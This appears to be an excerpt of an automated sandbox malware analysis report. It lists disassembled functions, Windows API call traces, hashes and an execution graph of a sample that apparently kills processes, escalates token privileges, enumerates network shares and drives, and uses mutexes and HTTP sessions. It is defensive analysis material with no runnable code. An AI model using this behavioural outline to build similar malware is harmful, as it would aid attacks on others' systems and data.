      • Instruction Fuzzy Hash: E721287590020AAFDF11DFA5CC80EAFBBB9FB49784F104529F411E2150EB719A06CF61
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00CA32FF Relevance: 6.1, APIs: 4, Instructions: 75COMMON
      Download Yara Rule
      APIs
        • Part of subcall function 00CA9041: GetProcessHeap.KERNEL32(00000000,?,00CA62B1,00000030,?,00000040,00CA2A6F,00CAB410), ref: 00CA904D
        • Part of subcall function 00CA9041: RtlAllocateHeap.NTDLL(00000000), ref: 00CA9054
      • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00000FA0,?,?,00CA56C4), ref: 00CA331E
      • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000), ref: 00CA3371
      • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000), ref: 00CA337B
      • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000), ref: 00CA3386
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: CreateEvent$Heap$AllocateCountCriticalInitializeProcessSectionSpin
      • String ID:
      • API String ID: 2451660498-0
      • Opcode ID: c42903696a9700ceed2d089fbdebf252c5474c15a51b6a96012ad47e33b658b8
      • Instruction ID: 5314fa032f878ba78f4907b324b57682f2c9bd9124cc286a52f2afc0fe928809
      • Opcode Fuzzy Hash: c42903696a9700ceed2d089fbdebf252c5474c15a51b6a96012ad47e33b658b8
      • Instruction Fuzzy Hash: 0A21DEB16013469FDB30AFA689D5B17F6E8FF49B48F01442EF28997590CBB0DA818B50
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00CA4FA9 Relevance: 6.1, APIs: 4, Instructions: 62COMMON
      Download Yara Rule
      APIs
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: CountTick$select
      • String ID:
      • API String ID: 2350311442-0
      • Opcode ID: b6bf4797658bb2e65eac2ba0743510369c53928a3ba76650a797d3a2a7a97330
      • Instruction ID: 5cec22478d4973f495d42e55e91f0358f561be690f62f176dabccaabfc5aa7ce
      • Opcode Fuzzy Hash: b6bf4797658bb2e65eac2ba0743510369c53928a3ba76650a797d3a2a7a97330
      • Instruction Fuzzy Hash: 25113D72D0021DABDB14DBA4CC85BDEB7BCAF09304F1040A6E704E7180DA709A458F91
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00CA4D68 Relevance: 6.0, APIs: 4, Instructions: 39threadsynchronizationCOMMON
      Download Yara Rule
      APIs
      • CreateThread.KERNEL32(00000000,00000000,00CA4B85,00000000,00000000,00000000), ref: 00CA4D8A
      • WaitForSingleObject.KERNEL32(00000000,00000000,?,00CA4DDD,00000000,00000000,?,00000000,?,00CA2C9F,0000002C), ref: 00CA4D98
      • GetExitCodeThread.KERNEL32(00000000,?,?,00CA4DDD,00000000,00000000,?,00000000,?,00CA2C9F,0000002C), ref: 00CA4DA7
      • CloseHandle.KERNEL32(00000000,?,00CA4DDD,00000000,00000000,?,00000000,?,00CA2C9F,0000002C), ref: 00CA4DB1
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Thread$CloseCodeCreateExitHandleObjectSingleWait
      • String ID:
      • API String ID: 478055939-0
      • Opcode ID: 9cefd910dab2b4de285f9e504e02158a3e9e76eab30a54041ba74f68972e5d4b
      • Instruction ID: 0f64a7c990f70d12bc9bbe65de9ffff5f4e8a76ce4f28ff9df95f07f34cdedd5
      • Opcode Fuzzy Hash: 9cefd910dab2b4de285f9e504e02158a3e9e76eab30a54041ba74f68972e5d4b
      • Instruction Fuzzy Hash: 37F0FE71502125BB8B259B65ED4DEFF7EBCEE87B697100015F805D3110D7748A01D6B2
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00CA349E Relevance: 6.0, APIs: 4, Instructions: 33synchronizationCOMMON
      Download Yara Rule
      APIs
      • LeaveCriticalSection.KERNEL32(?), ref: 00CA34B9
      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00CA34C3
      • EnterCriticalSection.KERNEL32(?), ref: 00CA34CA
        • Part of subcall function 00CA33F3: SetEvent.KERNEL32(00000004), ref: 00CA3459
        • Part of subcall function 00CA33F3: ResetEvent.KERNEL32(00000000), ref: 00CA3462
      • LeaveCriticalSection.KERNEL32(?), ref: 00CA34DD
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: CriticalSection$EventLeave$EnterObjectResetSingleWait
      • String ID:
      • API String ID: 3328302011-0
      • Opcode ID: 52577faffdf96924a7c26ccc67ff75190ef968995c950771129ea07b87de9262
      • Instruction ID: ffd2556799d3933af69241236506cf9aebeb9be2f54571655c6c5ad42d0f836c
      • Opcode Fuzzy Hash: 52577faffdf96924a7c26ccc67ff75190ef968995c950771129ea07b87de9262
      • Instruction Fuzzy Hash: FBF08272504246BBCB015B69ED44A9F7F6CEB0A3787104111F51693161DB71DE44C7A1
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00CA53E5 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
      Download Yara Rule
      APIs
      • EnterCriticalSection.KERNEL32(00CA1FEB,00CA1FDB,00000000,00000000,00CA5906,?,00CA1FDB,00000000,0000010C,?,?,000000FF), ref: 00CA53EE
      • SetEvent.KERNEL32(A0A815FF,?,00CA1FDB,00000000,0000010C,?,?,000000FF), ref: 00CA5404
      • SetEvent.KERNEL32(8B00CAA0,?,00CA1FDB,00000000,0000010C,?,?,000000FF), ref: 00CA5416
      • LeaveCriticalSection.KERNEL32(00CA1FEB,?,00CA1FDB,00000000,0000010C,?,?,000000FF), ref: 00CA541F
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: CriticalEventSection$EnterLeave
      • String ID:
      • API String ID: 2034477713-0
      • Opcode ID: b02ed5ac6350e599e52556e2e341f4a0f5e61dd19129847dccb3eb3162d4143f
      • Instruction ID: d897b6d64f215fb38f01c387a65cf39aae7bd8b306569b9eef2b86fe9fd25423
      • Opcode Fuzzy Hash: b02ed5ac6350e599e52556e2e341f4a0f5e61dd19129847dccb3eb3162d4143f
      • Instruction Fuzzy Hash: 9FF03772100A119BC7209F69DC40D56B7E9FF5A36A3218A25E9A3D3165C731EC81DB61
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00CA2084 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 86sharenetworkCOMMON
      Download Yara Rule
      APIs
      • WSAAddressToStringW.WS2_32(?,00000010,00000000,?,?), ref: 00CA20F9
      • WNetUseConnectionW.MPR(00000000,?,00000000,00000000,00000000,00000000,00000000,?), ref: 00CA2126
        • Part of subcall function 00CA1E10: WNetOpenEnumW.MPR(00000000,00000000,00000000,00000000,?), ref: 00CA1E66
        • Part of subcall function 00CA1E10: WNetEnumResourceW.MPR(?,?,00000000,?), ref: 00CA1E83
        • Part of subcall function 00CA1E10: WNetEnumResourceW.MPR(?,?,?,?), ref: 00CA2046
        • Part of subcall function 00CA1E10: WNetCloseEnum.MPR(?), ref: 00CA205E
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Enum$Resource$AddressCloseConnectionOpenString
      • String ID: \\e-
      • API String ID: 2373711962-2557246277
      • Opcode ID: 6487f508029036a16d2fdc6f5772ac4046fd2f4863183c6f747c9ea7d860c77b
      • Instruction ID: 413cb8dd199b6aec0281899bbe410ac00d5e76185d52c3971e32e5c825e213cd
      • Opcode Fuzzy Hash: 6487f508029036a16d2fdc6f5772ac4046fd2f4863183c6f747c9ea7d860c77b
      • Instruction Fuzzy Hash: 27211072508305AFD700DFA9CC85AABB7EDFF49714F00492EF694D6150E771DA188B92
      Uniqueness

      Uniqueness Score: -1.00%

      Execution Graph

      Execution Coverage:5.3%
      Dynamic/Decrypted Code Coverage:0%
      Signature Coverage:0%
      Total number of Nodes:1291
      Total number of Limit Nodes:7
      execution_graph 4673 d22ee 4674 d6347 2 API calls 4673->4674 4675 d2300 4674->4675 4676 d6347 2 API calls 4675->4676 4677 d230b 4676->4677 4678 d3955 9 API calls 4677->4678 4679 d231e 4678->4679 4680 d2332 4679->4680 4698 d3dc0 GetCurrentProcess OpenProcessToken 4679->4698 4681 d237b 4680->4681 4684 d35d2 4 API calls 4680->4684 4683 d3955 9 API calls 4681->4683 4687 d2387 4683->4687 4692 d2344 4684->4692 4686 d39da 2 API calls 4686->4680 4716 d90a1 GetProcessHeap HeapFree 4687->4716 4689 d39da 2 API calls 4689->4681 4690 d2390 4693 d236d 4692->4693 4697 d2372 4692->4697 4704 d4dee CreateToolhelp32Snapshot 4692->4704 4714 d5962 EnterCriticalSection LeaveCriticalSection 4692->4714 4715 d90a1 GetProcessHeap HeapFree 4693->4715 4697->4689 4699 d3e25 4698->4699 4700 d3de6 LookupPrivilegeValueW 4698->4700 4702 d3e2a CloseHandle 4699->4702 4703 d232b 4699->4703 4700->4699 4701 d3df8 AdjustTokenPrivileges 4700->4701 4701->4699 4702->4703 4703->4686 4705 d2351 Sleep 4704->4705 4706 d4e11 4704->4706 4705->4692 4707 d4e25 Process32FirstW 4706->4707 4708 d4e99 CloseHandle 4707->4708 4709 d4e48 4707->4709 4708->4705 4710 d4e5d OpenProcess 4709->4710 4711 d4e84 Process32NextW 4709->4711 4710->4709 4712 d4e74 TerminateProcess CloseHandle 4710->4712 4711->4709 4713 d4e98 4711->4713 4712->4709 4713->4708 4714->4692 4715->4697 4716->4690 4717 d34eb 4718 d3577 4717->4718 4719 d3509 4717->4719 4719->4718 4720 d3539 ResetEvent SetEvent 4719->4720 4721 d354b 4719->4721 4720->4721 4722 d3566 4721->4722 4725 d31c3 4721->4725 4722->4718 4723 d356d SetEvent 4722->4723 4723->4718 4726 d31ce 4725->4726 4727 d31d9 4725->4727 4731 d30af 4726->4731 4738 d313f 4727->4738 4730 d31d6 4730->4722 4732 d30bc 4731->4732 4737 d30ca 4731->4737 4733 d30cd 4732->4733 4734 d30c4 4732->4734 4736 d9041 2 API calls 4733->4736 4735 d907a 2 API calls 4734->4735 4735->4737 4736->4737 4737->4730 4739 d31a0 4738->4739 4740 d3146 4738->4740 4739->4730 4740->4739 4741 d907a 2 API calls 4740->4741 4741->4739 4742 d1cc5 GetLogicalDrives 4743 d3c7a 10 API calls 4742->4743 4744 d1ce0 4743->4744 4745 d6347 2 API calls 4744->4745 4746 d1cee 4745->4746 4766 d530c 4746->4766 4749 d3955 9 API calls 4764 d1d17 4749->4764 4750 d1dd9 4751 d1de6 4750->4751 4779 d52de 4750->4779 4752 d39da 2 API calls 4751->4752 4754 d1def 4752->4754 4756 d3955 9 API calls 4754->4756 4757 d1dfb 4756->4757 4786 d90a1 GetProcessHeap HeapFree 4757->4786 4758 d1d33 GetLogicalDrives 4760 d1dbe Sleep 4758->4760 4758->4764 4760->4764 4761 d1e04 4762 d1706 22 API calls 4762->4764 4764->4750 4764->4751 4764->4758 4764->4760 4764->4762 4765 d5840 49 API calls 4764->4765 4776 d542b WaitForSingleObject 4764->4776 4778 d5962 EnterCriticalSection LeaveCriticalSection 4764->4778 4765->4764 4767 d9041 2 API calls 4766->4767 4768 d5315 4767->4768 4769 d531e InitializeCriticalSectionAndSpinCount 4768->4769 4775 d1d05 4768->4775 4770 d5368 4769->4770 4771 d5331 CreateEventW CreateEventW 4769->4771 4787 d90a1 GetProcessHeap HeapFree 4770->4787 4772 d535c 4771->4772 4774 d52de 5 API calls 4772->4774 4772->4775 4774->4775 4775->4749 4777 d543d 4776->4777 4777->4764 4778->4764 4780 d52ec CloseHandle 4779->4780 4781 d52ef 4779->4781 4780->4781 4782 d52f9 DeleteCriticalSection 4781->4782 4783 d52f6 CloseHandle 4781->4783 4788 d90a1 GetProcessHeap HeapFree 4782->4788 4783->4782 4785 d5309 4785->4751 4786->4761 4787->4775 4788->4785 4789 d5444 4794 d5962 EnterCriticalSection LeaveCriticalSection 4789->4794 4791 d5458 4792 d5474 4791->4792 4795 d349e 4791->4795 4794->4791 4796 d34c9 EnterCriticalSection 4795->4796 4801 d33f3 4796->4801 4799 d34dc LeaveCriticalSection 4799->4792 4800 d34b8 LeaveCriticalSection WaitForSingleObject 4800->4796 4802 d3411 4801->4802 4803 d3423 4802->4803 4804 d3490 ResetEvent 4802->4804 4805 d31c3 4 API calls 4802->4805 4807 d3468 4802->4807 4803->4807 4808 d3450 SetEvent ResetEvent 4803->4808 4804->4807 4806 d348c 4805->4806 4806->4803 4806->4804 4807->4799 4807->4800 4808->4807 3653 d2fa7 3656 d29f5 3653->3656 3657 d2f9e ExitProcess 3656->3657 3658 d2a47 3656->3658 3658->3657 3795 d62a6 3658->3795 3660 d2a6f 3660->3657 3804 d6347 3660->3804 3662 d2a8c GetTickCount 3663 d2aa0 3662->3663 3664 d2abe 3663->3664 3665 d2aa6 GetLocaleInfoW 3663->3665 3668 d2ef0 3664->3668 3808 d2876 3664->3808 3665->3664 3667 d2add 3669 d6347 2 API calls 3667->3669 3670 d2efd 3668->3670 4194 d597e EnterCriticalSection DeleteCriticalSection 3668->4194 3671 d2ae5 3669->3671 3674 d2f0e 3670->3674 3677 d597e 4 API calls 3670->3677 3673 d2b01 3671->3673 3820 d271b 3671->3820 3849 d39da 3673->3849 3678 d2f44 3674->3678 3679 d2f12 EnterCriticalSection 3674->3679 3677->3674 3684 d2876 2 API calls 3678->3684 3682 d2f28 3679->3682 3683 d2f21 CloseHandle 3679->3683 3688 d2f37 DeleteCriticalSection 3682->3688 3689 d2f30 CloseHandle 3682->3689 3683->3682 3686 d2f4e 3684->3686 4198 d39b7 3686->4198 4197 d90a1 GetProcessHeap HeapFree 3688->4197 3689->3688 3690 d2876 2 API calls 3690->3673 3695 d2f6a 3698 d2f79 3695->3698 3700 d1870 2 API calls 3695->3700 3701 d2f7f ReleaseMutex CloseHandle 3698->3701 3702 d2f93 3698->3702 3700->3698 3701->3702 4210 d6274 3702->4210 3707 d5930 5 API calls 3708 d2b54 3707->3708 3708->3668 3709 d2b6e 3708->3709 3710 d2be6 3708->3710 3712 d4ea5 14 API calls 3709->3712 3900 d4ea5 3710->3900 3713 d2b75 3712->3713 3713->3668 3717 d4f7a 16 API calls 3713->3717 3715 d2bf1 3918 d4f7a 3715->3918 3716 d2c62 3719 d2c98 3716->3719 3723 d4f7a 16 API calls 3716->3723 3720 d2b84 3717->3720 3721 d4dbe 28 API calls 3719->3721 3724 d2ba3 3720->3724 3727 d2b8f 3720->3727 3725 d2c9f 3721->3725 3726 d2c6f 3723->3726 3728 d2bbf 3724->3728 3956 d4dbe 3724->3956 3729 d2ccc 3725->3729 3736 d2cac 3725->3736 3731 d2be0 3726->3731 3732 d2c74 3726->3732 3923 d49d3 3727->3923 3728->3731 3748 d4dbe 28 API calls 3728->3748 3733 d3c7a 10 API calls 3729->3733 3730 d2c1d 3730->3668 3741 d2c15 3730->3741 3731->3719 3734 d2c8e 3731->3734 3993 d489e 3732->3993 3740 d2cdc 3733->3740 4007 d2946 3734->4007 4098 d3c7a 3736->4098 3737 d2c10 3963 d242f CreateEventW 3737->3963 3749 d1894 10 API calls 3740->3749 3741->3668 3741->3730 3974 d4944 GetVersion 3741->3974 3747 d2c7d Sleep 3747->3731 3748->3731 3754 d2ce3 3749->3754 3752 d2b98 Sleep 3752->3724 3758 d3c7a 10 API calls 3754->3758 3755 d2c38 3755->3668 3761 d4f7a 16 API calls 3755->3761 3764 d2c51 Sleep 3755->3764 3760 d2cf8 3758->3760 3759 d2cc4 3759->3668 3763 d2d0f 3759->3763 3762 d1894 10 API calls 3760->3762 3761->3755 3762->3759 4144 d24c2 3763->4144 3764->3755 3766 d2c5d 3764->3766 3766->3668 3767 d2d24 3768 d2e17 3767->3768 3769 d2d47 CreateThread 3767->3769 3770 d24c2 3 API calls 3768->3770 3771 d2ed5 3769->3771 3772 d2d6a 3769->3772 4658 d239a 3769->4658 3773 d2e02 3770->3773 3771->3668 3777 d2ee6 CloseHandle 3771->3777 3774 d2d90 3772->3774 3775 d24c2 3 API calls 3772->3775 3778 d2e3f WaitForSingleObject 3773->3778 3779 d2e4b 3773->3779 3776 d24c2 3 API calls 3774->3776 3775->3774 3780 d2dbb 3776->3780 3777->3771 3778->3779 4149 d5962 EnterCriticalSection LeaveCriticalSection 3779->4149 3783 d24c2 3 API calls 3780->3783 3782 d2e54 3784 d2e96 3782->3784 3790 d2e69 3782->3790 4150 d1000 3782->4150 3785 d2de6 3783->3785 3786 d2e9d EnterCriticalSection LeaveCriticalSection 3784->3786 3787 d2ebe 3784->3787 3788 d24c2 3 API calls 3785->3788 3786->3787 3787->3771 3789 d2ec2 WaitForMultipleObjects 3787->3789 3788->3773 3789->3771 3792 d2946 18 API calls 3790->3792 3793 d2e74 3790->3793 3792->3793 3793->3784 3794 d4dbe 28 API calls 3793->3794 3794->3784 4218 d9041 3795->4218 3797 d62b1 3798 d9041 2 API calls 3797->3798 3802 d62f9 3797->3802 3799 d62c5 3798->3799 3800 d9041 2 API calls 3799->3800 3801 d62d3 3800->3801 3801->3802 3803 d6274 2 API calls 3801->3803 3802->3660 3803->3802 3805 d636b 3804->3805 3807 d6383 3804->3807 3806 d9041 2 API calls 3805->3806 3805->3807 3806->3807 3807->3662 3809 d287d 3808->3809 3810 d2883 3808->3810 4221 d90a1 GetProcessHeap HeapFree 3809->4221 3815 d2891 3810->3815 4222 d90a1 GetProcessHeap HeapFree 3810->4222 3813 d28ad 3818 d28bb 3813->3818 4225 d90a1 GetProcessHeap HeapFree 3813->4225 3814 d289f 3814->3813 4224 d90a1 GetProcessHeap HeapFree 3814->4224 3815->3814 4223 d90a1 GetProcessHeap HeapFree 3815->4223 3818->3667 3821 d9041 2 API calls 3820->3821 3822 d273d 3821->3822 3823 d9041 2 API calls 3822->3823 3824 d2748 3823->3824 3825 d2836 3824->3825 3828 d2843 3824->3828 4226 d5b20 3824->4226 3825->3828 4247 d90a1 GetProcessHeap HeapFree 3825->4247 3829 d2851 3828->3829 4248 d90a1 GetProcessHeap HeapFree 3828->4248 3832 d285f 3829->3832 4249 d90a1 GetProcessHeap HeapFree 3829->4249 3830 d2765 3830->3825 3836 d278f CreateFileW 3830->3836 3834 d2870 3832->3834 4250 d90a1 GetProcessHeap HeapFree 3832->4250 3834->3673 3834->3690 3836->3825 3837 d27ad SetFilePointer 3836->3837 3838 d9041 2 API calls 3837->3838 3839 d27c2 3838->3839 3840 d9041 2 API calls 3839->3840 3841 d27cf 3840->3841 3842 d282d CloseHandle 3841->3842 3843 d27dd SetFilePointer 3841->3843 3842->3825 3843->3842 3844 d27e9 ReadFile 3843->3844 3844->3842 3845 d27ff 3844->3845 3845->3842 3846 d2804 MultiByteToWideChar 3845->3846 4235 d2504 3846->4235 3850 d39e3 3849->3850 3852 d2b07 3849->3852 3851 d39b7 2 API calls 3850->3851 3851->3852 3853 d3e39 GetVersion 3852->3853 3854 d2b0d 3853->3854 3855 d3e52 GetCurrentProcess OpenProcessToken 3853->3855 3859 d3772 3854->3859 3856 d3e69 GetTokenInformation 3855->3856 3857 d3e87 3855->3857 3856->3857 3857->3854 3858 d3e90 FindCloseChangeNotification 3857->3858 3858->3854 3860 d9041 2 API calls 3859->3860 3861 d377f 3860->3861 3862 d9041 2 API calls 3861->3862 3863 d378c 3862->3863 3864 d9041 2 API calls 3863->3864 3865 d3794 3864->3865 3866 d37a1 InitializeCriticalSectionAndSpinCount 3865->3866 3875 d3827 3865->3875 3867 d37b1 3866->3867 3872 d37b7 3866->3872 4282 d90a1 GetProcessHeap HeapFree 3867->4282 3870 d37c0 AllocConsole GetStdHandle 3876 d37d3 3870->3876 3871 d2b27 3871->3668 3880 d28ca 3871->3880 3872->3870 3872->3876 3873 d3835 3873->3871 4284 d90a1 GetProcessHeap HeapFree 3873->4284 3875->3873 4283 d90a1 GetProcessHeap HeapFree 3875->4283 3876->3875 3877 d5b20 5 API calls 3876->3877 3878 d37eb 3877->3878 3878->3875 3879 d380d CreateFileW 3878->3879 3879->3875 3881 d3c7a 10 API calls 3880->3881 3882 d28d8 3881->3882 3883 d6347 2 API calls 3882->3883 3884 d28e4 3883->3884 3892 d292e 3884->3892 4285 d5fe7 3884->4285 3886 d39da 2 API calls 3888 d2939 3886->3888 3889 d39da 2 API calls 3888->3889 3891 d2940 3889->3891 3893 d5930 3891->3893 3892->3886 3894 d9041 2 API calls 3893->3894 3895 d5938 3894->3895 3896 d593f InitializeCriticalSectionAndSpinCount 3895->3896 3897 d2b43 3895->3897 3896->3897 3898 d5955 3896->3898 3897->3670 3897->3707 4324 d90a1 GetProcessHeap HeapFree 3898->4324 3901 d3c7a 10 API calls 3900->3901 3902 d4eb4 3901->3902 3903 d6347 2 API calls 3902->3903 3904 d4ebe 3903->3904 3905 d5fe7 6 API calls 3904->3905 3906 d4f0b 3905->3906 3907 d4f4b 3906->3907 3908 d4f17 OpenMutexW 3906->3908 3912 d4f62 3907->3912 3913 d4f55 CloseHandle 3907->3913 3909 d4f39 WaitForSingleObject 3908->3909 3910 d4f2a CreateMutexW 3908->3910 3909->3907 3909->3912 3910->3909 3911 d4f60 3910->3911 3911->3912 3914 d39da 2 API calls 3912->3914 3913->3912 3915 d4f6a 3914->3915 3916 d39da 2 API calls 3915->3916 3917 d2bec 3916->3917 3917->3715 3917->3716 3919 d4ea5 14 API calls 3918->3919 3920 d4f8b 3919->3920 3921 d2bf8 3920->3921 3922 d4f92 ReleaseMutex CloseHandle 3920->3922 3921->3668 3921->3730 3921->3737 3922->3921 3924 d6347 2 API calls 3923->3924 3925 d49ef 3924->3925 3926 d9041 2 API calls 3925->3926 3927 d4a0b GetVersion 3926->3927 3928 d4a39 3927->3928 3929 d4b3a 3928->3929 4325 d3d4b 3928->4325 3931 d4b3f CloseHandle 3929->3931 3932 d4b44 3929->3932 3931->3932 3933 d4b4e 3932->3933 3934 d4b49 CloseHandle 3932->3934 3936 d4b58 3933->3936 3937 d4b53 CloseHandle 3933->3937 3934->3933 3939 d4b5d CloseHandle 3936->3939 3940 d4b62 3936->3940 3937->3936 3938 d4a89 3955 d4b08 3938->3955 4334 d5b0e GetModuleFileNameW 3938->4334 3939->3940 3942 d4b6f 3940->3942 4335 d90a1 GetProcessHeap HeapFree 3940->4335 3941 d3d4b 6 API calls 3943 d4b2e 3941->3943 3947 d39b7 2 API calls 3942->3947 3943->3929 3948 d4b35 CloseHandle 3943->3948 3945 d4a9a 3949 d4aa3 GetShellWindow 3945->3949 3945->3955 3950 d2b94 3947->3950 3948->3929 3951 d4aad GetWindowThreadProcessId 3949->3951 3949->3955 3950->3724 3950->3752 3952 d4abc OpenProcess 3951->3952 3951->3955 3953 d4ad2 OpenProcessToken 3952->3953 3952->3955 3954 d4ae7 DuplicateTokenEx 3953->3954 3953->3955 3954->3955 3955->3941 3957 d6347 2 API calls 3956->3957 3958 d4dcf 3957->3958 3959 d4de6 3958->3959 4336 d4d68 3958->4336 3959->3728 3964 d24ba 3963->3964 3965 d2450 CreateThread 3963->3965 3964->3741 3966 d2463 3965->3966 4409 d454b 3965->4409 3967 d4f7a 16 API calls 3966->3967 3968 d247c SetEvent WaitForSingleObject 3966->3968 3969 d2470 Sleep 3966->3969 3967->3966 3971 d249f GetExitCodeThread 3968->3971 3972 d24aa CloseHandle 3968->3972 3969->3966 3969->3968 3971->3972 3972->3964 3973 d24b7 CloseHandle 3972->3973 3973->3964 3975 d6347 2 API calls 3974->3975 3976 d4962 3975->3976 3977 d9041 2 API calls 3976->3977 3978 d496e 3977->3978 3980 d4428 13 API calls 3978->3980 3990 d49b7 3978->3990 3979 d49c3 3983 d39da 2 API calls 3979->3983 3982 d497d 3980->3982 3985 d3d4b 6 API calls 3982->3985 3982->3990 3984 d49ca 3983->3984 3984->3755 3986 d498c 3985->3986 3987 d49a8 3986->3987 4541 d5b0e GetModuleFileNameW 3986->4541 3988 d3d4b 6 API calls 3987->3988 3988->3990 3990->3979 4542 d90a1 GetProcessHeap HeapFree 3990->4542 3991 d499c 3991->3987 3992 d3e9e ShellExecuteExW 3991->3992 3992->3987 3994 d9041 2 API calls 3993->3994 3995 d48b6 3994->3995 3996 d3d4b 6 API calls 3995->3996 3997 d48e0 3996->3997 3998 d4925 3997->3998 4543 d5b0e GetModuleFileNameW 3997->4543 4000 d3d4b 6 API calls 3998->4000 4002 d492f 4000->4002 4001 d48ec 4001->3998 4003 d48f1 CreateProcessW 4001->4003 4006 d2c79 4002->4006 4544 d90a1 GetProcessHeap HeapFree 4002->4544 4003->3998 4004 d4915 CloseHandle CloseHandle 4003->4004 4004->3998 4006->3731 4006->3747 4008 d3c7a 10 API calls 4007->4008 4009 d2954 4008->4009 4010 d6347 2 API calls 4009->4010 4011 d2960 4010->4011 4012 d6347 2 API calls 4011->4012 4013 d296b 4012->4013 4014 d6347 2 API calls 4013->4014 4016 d2976 4014->4016 4015 d29cb 4017 d39da 2 API calls 4015->4017 4016->4015 4545 d620d 4016->4545 4019 d29d6 4017->4019 4020 d39da 2 API calls 4019->4020 4021 d29df 4020->4021 4022 d39f9 2 API calls 4021->4022 4024 d29e8 4022->4024 4023 d29af 4023->4015 4552 d3cbd WinHttpOpen 4023->4552 4026 d39f9 2 API calls 4024->4026 4027 d29ef 4026->4027 4028 d1236 4027->4028 4029 d6347 2 API calls 4028->4029 4030 d124c 4029->4030 4031 d3bb3 9 API calls 4030->4031 